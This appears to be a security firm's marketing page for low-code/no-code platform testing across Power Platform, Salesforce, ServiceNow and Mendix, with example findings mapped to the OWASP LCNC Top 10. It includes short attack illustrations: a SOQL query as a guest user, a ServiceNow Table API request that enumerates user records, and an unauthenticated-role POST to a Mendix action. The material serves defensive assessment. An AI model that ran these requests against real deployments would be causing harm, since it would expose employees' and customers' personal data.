The Attack Surface Your Developers Can’t See.
Citizen developers build with production access, live data connectors, and service accounts that bypass every control your security team put in place. We test the platforms, the integrations, and the automations : mapped to the OWASP LCNC Top 10.
Three Reasons LCNC Platforms Are a Security Blind Spot.
No visibility into what was built
Security teams rarely have insight into what citizen developers have built, which data sources they’ve connected, or which service accounts they’re reusing. Shadow IT that lives natively inside sanctioned platforms is invisible to traditional discovery tooling.
Production access by default
Low-code platforms authenticate with elevated service accounts. A misconfigured flow runs with the same permissions as your system administrator. There is no least-privilege sandbox between the canvas and your production data tier.
Your controls don’t apply here
DLP policies, network segmentation, and data classification labels designed for traditional apps often have no enforcement path inside Power Automate, Salesforce Flows, or ServiceNow workflows. The platform runs outside the boundary you secured.
Five Platforms. Every Layer of the LCNC Stack.
Select a platform to see what gets tested and which OWASP LCNC Top 10 categories apply.
Microsoft Power Platform
Power Apps · Power Automate · Power BI · Dataverse
- Connector credential exposure Shared connections grant all users the maker’s data access : a single shared connector can silently escalate every co-author in an environment to the creating user’s permission level.
- DLP policy bypass via undeclared connectors Connectors not covered by an active DLP policy operate in an unrestricted channel, enabling data egress outside defined policy scope even when a policy is technically enforced.
- Power Apps row-level security gaps Gallery and form views populated directly from Dataverse or SharePoint can expose cross-user records when row-level security is applied to the source but not propagated to the canvas binding.
- Power BI embedded credential leakage Reports published with embedded data-source credentials and row-level security bypass through direct DAX queries submitted via the XMLA endpoint or REST API.
Shared Connector Grants Admin-Level SharePoint Access to All Makers
Power Automate → SharePoint connector (shared)
The SharePoint connector was created by a Global Admin and shared across the development environment. All 47 makers can invoke flows that read, write, and delete any item across all site collections the creating account can access. No additional authorization check is performed at flow execution time.
Salesforce Platform
Sales Cloud · Service Cloud · Experience Cloud · Apex · Flows
- Guest user object access Experience Cloud sites can expose internal objects to unauthenticated users when object-level and field-level security is not explicitly configured for the guest profile : a common misconfiguration in high-velocity deployments.
- Apex trigger privilege escalation Without-sharing Apex classes execute in system context regardless of the running user’s profile, enabling privilege escalation when invoked via triggers or public REST endpoints exposed to lower-privileged callers.
- SOQL injection via user-controlled input Custom Apex controllers and Flow-invocable actions that concatenate user-supplied strings into dynamic SOQL queries are vulnerable to injection, allowing record extraction beyond the caller’s sharing model.
- Connected app over-permission OAuth scopes granted to connected apps frequently exceed functional requirements, providing third-party integrations with access to objects and actions the integration never uses : violating least-privilege at the API authorization layer.
Experience Cloud Guest User Reads Internal Case Records Without Sharing Rule
SELECT Id, Subject, Description FROM Case
-- no sharing rule applied; guest profile has Read on Case
The Experience Cloud guest user profile was granted Read access to the Case object during an expedited deployment. No sharing rules restrict the visible record set. An unauthenticated site visitor can enumerate all 83,000+ case records, including personally identifiable information and internal notes.
ServiceNow Platform
ITSM · HRSD · CSM · Service Portal · Integration Hub
-
Public REST API table exposure
ServiceNow tables are accessible via the Table API (
/api/now/table/<table>) without requiring an ACL when the default “read” operation condition evaluates to true for unauthenticated or low-privilege users. -
Script Include privilege escalation
Script Includes configured with
callerAccessset tocallercan be invoked cross-scope, allowing application-scoped scripts to call global Script Includes that operate in elevated system context without role validation. - Service Portal widget injection Client-side scripts in custom Service Portal widgets that render user-controlled field values without HTML encoding are vulnerable to stored XSS, executing attacker-supplied JavaScript in the context of any authenticated user who views the portal page.
- Integration Hub spoke credential storage Spoke connection records store service account credentials in the platform credential store. Developers with spoke configuration access can retrieve credentials via server-side script execution, bypassing vault integration controls.
sys_user Table Exposed via REST API Without ACL Restriction
GET /api/now/table/sys_user?sysparm_fields=
user_name,email,mobile_phone&sysparm_limit=10000
The sys_user table ACL was inadvertently removed during a platform upgrade.
Any authenticated session : including Integration Hub service accounts shared
with third-party vendors : can enumerate all user records. The response includes
usernames, email addresses, and mobile phone numbers for 4,200 employees.
Enterprise LCNC Platforms
Mendix · OutSystems · Appian · Pega
- Broken object-level authorization Entity access rules defined in the platform model are not consistently enforced at the REST API layer generated by the runtime, allowing direct object retrieval by GUID without a role membership check on the requesting identity.
- Insecure microflow and action execution Privileged server-side microflows and actions callable via the platform’s public API layer without an explicit role check at the action boundary : the designer assumed a UI-layer guard was sufficient.
- Multi-tenant isolation failures In multi-tenant deployments, application-level tenant discriminators not enforced in the data access layer allow cross-organization data retrieval when an authenticated user from one tenant crafts requests referencing another tenant’s object identifiers.
- Deployment pipeline credential exposure Service account credentials and API keys embedded in CI/CD pipeline configuration files, deployment scripts, or version-controlled application constants : accessible to all developers with repository read access.
Mendix API Action Callable Without Role Check on Requesting Identity
POST /xas/action/RetrieveAllCustomerData
Authorization: Bearer <any-valid-session-token>
The RetrieveAllCustomerData microflow was published to the REST interface
without a module role constraint. Any authenticated user : including those
assigned only the Viewer role : can invoke the action and receive the
full customer dataset. The UI presents the action only to Admin users, creating a
false assumption that the back-end is likewise restricted.
Risks That Apply to Every Platform
Pattern-level risks present regardless of the LCNC vendor or deployment model
- Service account impersonation Automation credentials shared across unrelated processes mean that any flow, workflow, or integration running under the shared account can act on behalf of the original identity : with no per-process isolation or audit trail to distinguish the source of an action.
- Workflow data exfiltration Flows triggered by external HTTP events, email parsing, or scheduled timers can export production records to external storage, personal cloud drives, or unmanaged webhook endpoints : entirely within the platform’s approved operations, invisible to CASB or DLP tooling.
- Tenant isolation bypass via connector sharing Connector sharing across organizational units or guest tenants allows automations in one business unit to consume data connections provisioned by and scoped to another : violating data residency boundaries without triggering access-control alerts.
- Logging and monitoring gaps Platform automation executions commonly produce no structured audit trail consumable by a SIEM. Flow run history is retained only within the platform’s native interface, inaccessible to centralized log aggregation, and purged on vendor-defined retention schedules.
Automation Flow Writes Data to External Storage Without Generating an Audit Log
Power Automate → SharePoint List (source)
→ OneDrive Personal (destination : unmanaged)
A scheduled Power Automate flow copies SharePoint list items : including a column containing employee salary bands : to a personal OneDrive account every 24 hours. The flow runs under a shared service account. The run history is visible only in the Power Automate portal and is not forwarded to the organization’s Sentinel SIEM. The flow has been executing undetected for 14 months.
Every Category. Tested Across Every Platform.
The OWASP Low-Code/No-Code Top 10 is the authoritative standard for LCNC platform risks. Every engagement covers all ten categories regardless of the platforms in scope.
Account Impersonation
Automation running under a shared service account impersonates a privileged user, granting every process that shares the credential the full rights of the account owner.
Authorization Misuse
Platform actions callable without the role check the designer assumed was enforced, because UI-layer guards are not replicated at the API or microflow boundary.
Data Leakage via Connectors
Connected data sources accessible to all makers sharing the connector, regardless of whether the individual maker should have access to the underlying data tier.
Credential Harvesting
Service account credentials stored in plaintext within platform configurations, connection records, or version-controlled deployment scripts accessible to developers.
Vulnerable & Untrusted Components
Third-party connectors, marketplace plugins, and community templates introduced without security vetting : an unreviewed supply chain inside a trusted platform.
Workflow Manipulation
Automation triggers exploitable via crafted inputs or external HTTP events to execute unintended business logic at the elevated privilege of the platform service account.
Cross-Site Scripting
User-controlled input rendered unsanitized in platform-generated portal pages, widget interfaces, and embedded views : stored XSS executing in authenticated user sessions.
Access Control
Object and record-level permissions not enforced at the API layer, relying on UI presentation logic as the sole access gate for sensitive data retrieval.
Asset Management
Abandoned apps, decommissioned flows, and forgotten integrations retaining active credentials and live data access long after the business process they served was retired.
Security Logging Failures
Platform automation producing no structured audit trail consumable by a SIEM, with run histories siloed inside the platform portal and purged on vendor-defined schedules.